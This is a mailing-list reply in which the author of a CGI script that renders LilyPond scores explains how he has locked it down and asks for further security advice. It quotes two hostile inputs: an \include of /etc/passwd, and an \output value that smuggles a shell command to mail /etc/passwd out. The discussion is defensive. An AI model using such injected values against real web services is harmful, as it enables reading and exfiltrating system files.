>>>>> "Mats" == Mats Bengtsson <[EMAIL PROTECTED]> writes:
Mats> I haven't looked much into this program, but I would suspect
Mats> this kind of WWW application to be full of security
Mats> holes. What happens for example if you write \include
Mats> "/etc/passwd"; in the input file?
it checks for that, and since it can't do anything about multi-file
scores at this time anyway, it dies and gives you this message if it
finds the string "\include" in your score:
Your score contains the word "\include", but this script is not
capable of processing multi-file scores at this time. Sorry about
that; you'll just have to put the whole score into a single file.
unless i'm mistaken, \include is the only way a mudela file can be
made to reach out into the environment; if i'm wrong, someone let me
know so i can protect against other abuses.
other than that, i don't think there's anything anyone can do with it,
but i'd love to hear if there's anything i need to do to lock it down
that i haven't done. here's what's happening:
it's given this path:
/bin:/usr/bin/:/usr/lib:/home/jeff/bin
and allowed to run these programs:
/usr/bin/ly2dvi --separate
/usr/bin/dvips
/home/jeff/bin/ps-to-gifs.sh
/usr/lib/sendmail -ti
the only potential security holes i see right now are these:
1. the ability to \include files. as i said, this is checked and
avoided.
2. the ability to insert commands into the ly2dvi command line. this
is avoided simply by not offering to let the user name the mudela
file. each one is named "score.ly" and processed as
"/usr/bin/ly2dvi --separate score.ly".
3. the ability to change the name of the output file with an \output
command in the paper block, so that the resulting tex file contains
a command, eg.:
\output "rondo ; mail [EMAIL PROTECTED] < /etc/passwd ; ";
but tex just dies on this with:
error: can't open file: `rondo ; mail [EMAIL PROTECTED] < /etc/passwd ; .tex'
4. problems inherent in using sendmail. i've followed the cgi
security faq guidelines on this; if anyone sees a problem with the
way i've done it, let me know.
in case you've forgotten, the script is living for now at:
http://plaything.smart.net/cgi-bin/lilypond_cgi.pl
all suggestions always welcome.
--
|----------------------------------------------------------------------------|
| jeff covey [EMAIL PROTECTED] http://pobox.com/~jeff.covey/ 410-669-4926 |
|----------------------------------------------------------------------------|
|when i go into stores, they try to sell me windoze. then i look behind the |
|counter, and they're using linux and x. what's wrong with this picture? |
|----------------------------------------------------------------------------|
